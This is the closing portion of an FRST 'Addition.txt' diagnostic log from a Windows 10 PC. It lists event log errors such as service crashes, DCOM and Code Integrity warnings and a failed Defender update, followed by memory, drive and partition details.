Faulting package full name: AcroTray.exe4
Faulting package-relative application ID: AcroTray.exe5
Error: (06/12/2016 02:54:10 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
Error: (06/11/2016 10:23:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2203
System errors:
Error: (06/16/2016 04:03:31 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Definition Update for Windows Defender - KB2267602 (Definition 1.223.1752.0).
Error: (06/16/2016 03:58:27 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Wondershare Application Framework Service service terminated unexpectedly. It has done this 1 time(s).
Error: (06/16/2016 03:58:11 PM) (Source: ACPI) (EventID: 4) (User: )
Description: AMLI: ACPI BIOS is attempting to read from an illegal IO port address (0x70), which lies in the 0x70 - 0x71 protected address range. This could lead to system instability. Please contact your system vendor for technical assistance.
Error: (06/16/2016 03:58:06 PM) (Source: Application Popup) (EventID: 56) (User: )
Description: ACPI5
Error: (06/16/2016 03:57:36 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_1ad62f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (06/16/2016 03:57:36 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_1ad62f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (06/16/2016 03:57:36 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_1ad62f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (06/16/2016 03:57:36 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_1ad62f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (06/16/2016 03:57:36 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
Error: (06/16/2016 11:25:20 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
Date: 2016-06-16 06:56:39.173
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-06-15 06:08:43.363
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-06-10 12:09:40.781
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-06-06 08:38:12.918
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-06-04 12:20:07.947
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-06-03 23:36:36.420
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-05-29 11:32:24.339
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-05-28 20:32:34.912
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Lenovo\QuickOptimizer\ShowTaskbarIcon.dll that did not meet the Store signing level requirements.
Date: 2016-05-28 20:29:27.911
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-05-26 18:04:10.668
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
==================== Memory info ===========================
Processor: Intel® Core i7-6700 CPU @ 3.40GHz
Percentage of memory in use: 28%
Total physical RAM: 16287.52 MB
Available physical RAM: 11697.72 MB
Total Virtual: 24479.52 MB
Available Virtual: 19541.36 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:177.5 GB) (Free:98.05 GB) NTFS
Drive d: () (Fixed) (Total:901.02 GB) (Free:835.26 GB) NTFS
==================== MBR & Partition Table ==================
Disk: 0 (Size: 178.9 GB) (Disk ID: 84C06A8A)
Partition: GPT.
Disk: 1 (Size: 931.5 GB) (Disk ID: 84C06A9B)
Partition: GPT.
==================== End of Addition.txt ============================